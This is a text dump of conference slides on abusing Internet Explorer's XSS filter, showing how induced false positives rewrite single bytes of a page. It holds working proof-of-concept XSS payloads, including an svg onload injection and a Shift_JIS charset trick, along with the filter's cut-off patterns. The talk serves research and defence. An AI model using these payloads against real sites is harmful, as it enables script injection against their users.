SlideShare a Scribd company logo
1 of 84
X-XSS-Nightmare: 1; mode=attack
XSS Attacks Exploiting XSS
Filter
(Prudence Edition)
Masato Kinugawa
Self-Introduction
Masato Kinugawa
Self-Introduction
Masato Kinugawa
x
s
Self-Introduction
Masato Kinugawa
x
s
B
Bug-hunter's Joy
Self-Introduction
Today's topics
ā¶XSS technique
ā·Bypass XSS filter technique
Using IEā€™s XSS filter
Today's topics
ā¶XSS technique
ā·Bypass XSS filter technique
Using IEā€™s XSS filter
Sorry! I Changed today's topics!
Today's topics
What is XSS filter?
How to associate with XSS filter?
XSS Filter
Chrome and Safari have the same function.
āž”This time, I pick up IE's filter.
It was introduced from IE8.(2009)
Basic of XSS filter of IE
http://example.com/?q=<img+src=x+onerror=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
q param is: <img src=x onerror=alert(1)>
</body>
</html>
Before cut-off
If request and response are matched with
dangerous condition, XSS filter rewrites a page.
Like this #
http://example.com/?q=<img+src=x+onerror=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
q param is: <img src=x #nerror=alert(1)>
</body>
</html>
If request and response are matched with
dangerous condition, XSS filter rewrites a page.
After cut-off
Inaccuracy of XSS Filter
If matched with the condition, XSS filter
rewrites a string unrelated to part of a
dynamic creation of user input.
http://example.com/?q=AAA&<meta+charset=
<!DOCTYPE html>
<html>
<head>
<m#ta charset="utf-8">
</head>
<body>
q param is: AAA
</body>
</html>
World of after introduction
of XSS filter
All site suddenly had the possibility of
partial rewrite of a page.
#
#
#
2008 2009
About little change
Is it no big deal?
āž”Letā€™s think about changing
1 byte at somewhere!
#
#
#
http://example.com/?q=AAA
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="AAA".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html> Dynamic creation of
User's input to inside
of string literal
http://example.com/?q="/</script
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s=""/</script".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html> XSS measures is OK
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html> &lt;svg/onload=alert(1)>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<scr#pt>
s="<svg/onload=alert(1)>".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<scr#pt>
s="<svg/onload=alert(1)>".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<scr#pt>
s="<svg/onload=alert(1)>".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/#/g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/#/g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/#/g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/#/g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/#/g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/#/g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/#/g,'&lt;');
document.write(s);
</script>
</body>
</html> <svg/onload=alert(1)>
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="<svg/onload=alert(1)>".replace(/#/g,'&lt;');
document.write(s);
</script>
</body>
</html> <svg/onload=alert(1)>
http://example.com/?q=</title><svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="</title><svg/onload=alert(1)>".replace(/</g,'&l
t;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=</title><svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</ti#le>
</head>
<body>
<script>
s="</title><svg/onload=alert(1)>".replace(/</g,'&l
t;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=</title><svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</ti#le>
</head>
<body>
<script>
s="</title><svg/onload=alert(1)>".replace(/</g,'&l
t;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=</title><svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</ti#le>
</head>
<body>
<script>
s="</title><svg/onload=alert(1)>".replace(/</g,'&l
t;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=</title><svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</ti#le>
</head>
<body>
<script>
s="</title><svg/onload=alert(1)>".replace(/</g,'&l
t;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=%E3%81%95";alert(1)//
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="恕";alert(1)//".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=%E3%81%95";alert(1)//
<!DOCTYPE html>
<html>
<head>
<m#ta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="恕";alert(1)//".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
Interpretation of UTF-8
"恕";alert(1)//"
0xE3 0x81 0x95 0x5C
UTF-8 恕 
Shift_JIS ēøŗ č”Ø
"ēøŗč”Ø";alert(1)//"
Interpretation of Shift_JIS
0xE3 0x81 0x95 0x5C
UTF-8 恕 
Shift_JIS ēøŗ č”Ø
http://example.com/?q=%E3%81%95";alert(1)//
<!DOCTYPE html>
<html>
<head>
<m#ta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="ēøŗč”Ø";alert(1)//".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
http://example.com/?q=%E3%81%95";alert(1)//
<!DOCTYPE html>
<html>
<head>
<m#ta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>
s="ēøŗč”Ø";alert(1)//".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
Basically,
Even 1 byte of change is risk.
In the past,
If you don't do careful, Rewrite of
XSS filter also becomes vulnerable.
https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-
2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf
Universal XSS via IE8s XSS Filters
Eduardo Vela Nava & David Lindsay
2015: Is it safe at now?
Letā€™s see
how much real cut-off rule is!
I found XSS vulnerable patterns page
of normal structure which has no XSS
It is safeā€¦no, it doesn't!
Apart from it this
This case will publish after modify.
Cut-off Rule
It isn't documented in particular.
We can see the loading binary to browser of dll
include regular expression of cut-off strings.
<button value=
<form>
<textarea>
<isindex>
<input value=
<option value=
<embed src=
<embed type=
<iframe src=
<frame src=
<x:vmlframe src=
<link href=
<import implementation=
<meta http-equiv=
<meta charset=
<a href
<script src=
<script xlink:href=
<script href=
<script>
<applet>
<object type=
<object codetype=
<object classid=
<object code=
<object data=
<base href=
<style>@i
<style>:(
<style>:
<style>=(
<style>=
<button value=
<form>
<textarea>
<isindex>
<input value=
<option value=
<embed src=
<embed type=
<iframe src=
<frame src=
<x:vmlframe src=
<link href=
<import implementation=
<meta http-equiv=
<meta charset=
<a href
<script src=
<script xlink:href=
<script href=
<script>
<applet>
<object type=
<object codetype=
<object classid=
<object code=
<object data=
<base href=
<style>@i
<style>:(
<style>:
<style>=(
<style>=
<button value=
<form>
<textarea>
<isindex>
<input value=
<option value=
<embed src=
<embed type=
<iframe src=
<frame src=
<x:vmlframe src=
<link href=
<import implementation=
<meta http-equiv=
<meta charset=
<a href
<script src=
<script xlink:href=
<script href=
<script>
<applet>
<object type=
<object codetype=
<object classid=
<object code=
<object data=
<base href=
<style>@i
<style>:(
<style>:
<style>=(
<style>=
<button va#ue=
<fo#m>
<texta#ea>
<is#ndex>
<input va#ue=
<option va#ue=
<em#ed src=
<em#ed type=
<if#ame src=
<f#ame src=
<x:vmlf#ame src=
<li#k href=
<im#ort implementation=
<m#ta http-equiv=
<m#ta charset=
<a hr#f
<script src=
<script xlink:href=
<script href=
<script>
<ap#let>
<ob#ect type=
<ob#ect codetype=
<ob#ect classid=
<ob#ect code=
<ob#ect data=
<ba#e href=
<style>@i
<style>:(
<style>:
<style>=(
<style>= After cut-off
<button va#ue=
<fo#m>
<texta#ea>
<is#ndex>
<input va#ue=
<option va#ue=
<em#ed src=
<em#ed type=
<if#ame src=
<f#ame src=
<x:vmlf#ame src=
<li#k href=
<im#ort implementation=
<m#ta http-equiv=
<m#ta charset=
<a hr#f
<script src=
<script xlink:href=
<script href=
<script>
<ap#let>
<ob#ect type=
<ob#ect codetype=
<ob#ect classid=
<ob#ect code=
<ob#ect data=
<ba#e href=
<style>@i
<style>:(
<style>:
<style>=(
<style>= After cut-off
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<scr#pt>
s="<svg/onload=alert(1)>".replace(/</g,'&lt;');
document.write(s);
</script>
</body>
</html>
<a hr#f
<m#ta charset=
<li#k href=
<script>
DEMOā¶
ā·
āø
ā¹
I want you to feel it
Safety of your site is depend on XSS filter.
āž”Is it browser's bug?
Should browser do something about it?
I can not say rewrite of page is always safe.
From the first, your page is
Can you declare your site that can
stand up to partial breakdown?
XSS filter can do this
XSS filter very carefully rewrites a page.
#
In fact
In some case, it is possible to
not operate specific function
from intentional false positive.
(ā€¦)
Did the author of XSS filter
introduce XSS filter while
recognizing about the risks?
(or not) Iā€™m interested a little
about it.
Mr. Terada's blog
http://d.hatena.ne.jp/teracc/2
0090622
Browser side introduced it, knowing the risk.
Mr. Terada and Mr. Hasegawa's log at 6 years ago is as follows:
In fact
http://b.hatena.ne.jp/entry/14131603/comment/hasegawayosuke
Insider said
"The answer is Yes. ".
Mr. Hasegawa
Browser side introduced it, knowing the risk.
Mr. Terada and Mr. Hasegawa's log at 6 years ago is as follows:
āž”Does Web developer use it
while taking care of the risk?
What is
"taking care of the risk"?
āœ” you should completely grasp XSS filter's cut-
off action.
āœ” If the part of the page is rewritten, you should
inspect all page for normal operation and safety.
āœ” If the page includes dangerous part, you
should rewrite the code one by one for
avoidance.
Then, you should do as follows:
Can you do those?
Example of cut-off string
javascript:1
vbscript:1
vbs:1
Example of cut-off string
javasc#ipt:1
v#script:1
v#s:1
Is this simple?
Detail of cut-off of javascript:
{(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))([t]|(&(([#()[].]x?0
*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[].]x?0*((65)|(
41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)
|(newline;))))*(v|(&[#()[].]x?0*((86)|(56)|(118)|(76));?))([t]|(&(
([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[
].]x?0*((65)|(41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|
A|D);?)|(tab;)|(newline;))))*(s|(&[#()[].]x?0*((83)|(53)|(115)|(73)
);?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;)))
)*(c|(&[#()[].]x?0*((67)|(43)|(99)|(63));?))([t]|(&(([#()[].]x?0
*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&[#()[].]x?0*((82)|(
52)|(114)|(72));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;
)|(newline;))))*(i|(&[#()[].]x?0*((73)|(49)|(105)|(69));?))([t]|(&
(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&[#()[
].]x?0*((80)|(50)|(112)|(70));?))([t]|(&(([#()[].]x?0*(9|(13)|(10
)|A|D);?)|(tab;)|(newline;))))*(t|(&[#()[].]x?0*((84)|(54)|(116)|(7
4));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;)
)))*(:|(&(([#()[].]x?0*((58)|(3A));?)|(colon;)))).}
Detail of cut-off of javascript:
{(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))([t]|(&(([#()[].]x?0
*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[].]x?0*((65)|(
41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)
|(newline;))))*(v|(&[#()[].]x?0*((86)|(56)|(118)|(76));?))([t]|(&(
([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[
].]x?0*((65)|(41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|
A|D);?)|(tab;)|(newline;))))*(s|(&[#()[].]x?0*((83)|(53)|(115)|(73)
);?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;)))
)*(c|(&[#()[].]x?0*((67)|(43)|(99)|(63));?))([t]|(&(([#()[].]x?0
*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&[#()[].]x?0*((82)|(
52)|(114)|(72));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;
)|(newline;))))*(i|(&[#()[].]x?0*((73)|(49)|(105)|(69));?))([t]|(&
(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&[#()[
].]x?0*((80)|(50)|(112)|(70));?))([t]|(&(([#()[].]x?0*(9|(13)|(10
)|A|D);?)|(tab;)|(newline;))))*(t|(&[#()[].]x?0*((84)|(54)|(116)|(7
4));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;)
)))*(:|(&(([#()[].]x?0*((58)|(3A));?)|(colon;)))).}
http://masatokinugawa.l0.cm/2012/09/xss3.html
If you can do those,
āœ” you should completely grasp XSS filter's cut-
off action.
āœ” If the part of the page is rewritten, you should
inspect all page for normal operation and safety.
āœ” If the page includes dangerous part, you
should rewrite the code one by one for
avoidance.
I think you can modify all XSS on your site...
āž”What is the best?
X-XSS-Protection:
Value Effect
0 Disable
1
Enable
(Partial rewrite)
1;mode=block
Enable
(Prevent rendering of the page)
Default
The response header that can control
XSS filter.
How are
careful persons doing?
HTTP/2.0 200 OK
Date: Mon, 19 Oct 2015 22:32:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
...
HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 19 Oct 2015 22:40:37 GMT
x-content-type-options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 0
...
They are calculatingly
controlling!!
The choice which
considered more safety
Value Sites which should choose header
0
They are measuring basic XSS.
/They want to remove false-negative.
1
Not recommended
(Discovered technique affects here.)
1;mode
=block
It is probable that the site have XSS.
/They want to protect site just in case.
default
X-XSS-Protection:0 or 1;mode=block
Is mode=block safe?
It should don't affect direct script execution.
I think a favor of the filter is bigger than it.
If feature of cut-off can detect from outside,
they may guess page contents.
This possibility probably can't be changes
to zero.
On the other handā€¦
Comments for Web
developer
Me
How about changing to
1;mode=block?
Comments for Web
developer
How about changing to
1;mode=block?
Cut-off explanation is unkind,
It is difficult when user support
of false-negativeā€¦
Dev
Me
Cut-off explanation is
unkind.
Sureā€¦
I think this site is measuring basic XSS,
Would you like to use X-XSS-Protection:0?
Me
Comments for Web
developer
I think this site is measuring basic XSS,
Would you like to use X-XSS-Protection:0?
Me
User may think about setting of
infelicity security function with
highly priority of product action.
Dev
Comments for Web
developer
Trap of XSS filter
XSS filter cut off only attacked position then it
shows other position, it seems like the smartest.
0 1 block
This action is the risk.
Conclusions
I'm hoping for improvement of XSS filter.
It should still be possible to do safely.
Is present default action really OK?
In theory, cut-off risk is inseparable from
XSS filter.
I want web developer to know this possibility.
I highly recommend XSS protection control
except default action.
http://l0.cm/xxn/
Real Nightmare will be
published on this URL.
lower-case of L and Zero
";alert#"Thanks!"#//
@kinugawamasato
masatokinugawa@gmail#com

More Related Content

What's hot

BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat Security Conference
Ā 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
Ā 
Attacking and defending GraphQL applications: a hands-on approach
 Attacking and defending GraphQL applications: a hands-on approach Attacking and defending GraphQL applications: a hands-on approach
Attacking and defending GraphQL applications: a hands-on approachDavide Cioccia
Ā 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
Ā 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Aaron Hnatiw
Ā 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101Paul Ionescu
Ā 
The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016Frans RosĆ©n
Ā 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
Ā 
Frans RosƩn Keynote at BSides Ahmedabad
Frans RosƩn Keynote at BSides AhmedabadFrans RosƩn Keynote at BSides Ahmedabad
Frans RosƩn Keynote at BSides AhmedabadSecurity BSides Ahmedabad
Ā 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
Ā 
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...CODE BLUE
Ā 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
Ā 
WAF Bypass Techniques - Using HTTP Standard and Web Serversā€™ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Serversā€™ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Serversā€™ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Serversā€™ BehaviourSoroush Dalili
Ā 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Sagar M Parmar
Ā 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
Ā 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
Ā 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
Ā 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesSpin Lai
Ā 

What's hot (20)

BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
Ā 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
Ā 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Ā 
Attacking and defending GraphQL applications: a hands-on approach
 Attacking and defending GraphQL applications: a hands-on approach Attacking and defending GraphQL applications: a hands-on approach
Attacking and defending GraphQL applications: a hands-on approach
Ā 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
Ā 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016
Ā 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101
Ā 
The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016
Ā 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
Ā 
Frans RosƩn Keynote at BSides Ahmedabad
Frans RosƩn Keynote at BSides AhmedabadFrans RosƩn Keynote at BSides Ahmedabad
Frans RosƩn Keynote at BSides Ahmedabad
Ā 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
Ā 
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
Ā 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
Ā 
WAF Bypass Techniques - Using HTTP Standard and Web Serversā€™ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Serversā€™ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Serversā€™ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Serversā€™ Behaviour
Ā 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17
Ā 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
Ā 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Ā 
Bug Bounty Secrets
Bug Bounty Secrets Bug Bounty Secrets
Bug Bounty Secrets
Ā 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Ā 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best Practices
Ā 

Similar to XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015

Good practices for PrestaShop code security and optimization
Good practices for PrestaShop code security and optimizationGood practices for PrestaShop code security and optimization
Good practices for PrestaShop code security and optimizationPrestaShop
Ā 
JavaScript For People Who Don't Code
JavaScript For People Who Don't CodeJavaScript For People Who Don't Code
JavaScript For People Who Don't CodeChristopher Schmitt
Ā 
Webpack packing it all
Webpack packing it allWebpack packing it all
Webpack packing it allCriciĆŗma Dev
Ā 
Packing it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowPacking it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowDerek Willian Stavis
Ā 
XSLT for Web Developers
XSLT for Web DevelopersXSLT for Web Developers
XSLT for Web DevelopersSanders Kleinfeld
Ā 
Web performance essentials - Goodies
Web performance essentials - GoodiesWeb performance essentials - Goodies
Web performance essentials - GoodiesJerry Emmanuel
Ā 
How Xslate Works
How Xslate WorksHow Xslate Works
How Xslate WorksGoro Fuji
Ā 
&lt;img src="xss.com">
&lt;img src="xss.com">&lt;img src="xss.com">
&lt;img src="xss.com">"&lt;u>aaa&lt;/u>
Ā 
Introduction to java script
Introduction to java scriptIntroduction to java script
Introduction to java scriptnanjil1984
Ā 
Enhance Web Performance
Enhance Web PerformanceEnhance Web Performance
Enhance Web PerformanceAdam Lu
Ā 
Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"Fwdays
Ā 
Slides
SlidesSlides
Slidesvti
Ā 
Xhtml Basics
Xhtml BasicsXhtml Basics
Xhtml BasicsAkramWaseem
Ā 

Similar to XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015 (20)

Good practices for PrestaShop code security and optimization
Good practices for PrestaShop code security and optimizationGood practices for PrestaShop code security and optimization
Good practices for PrestaShop code security and optimization
Ā 
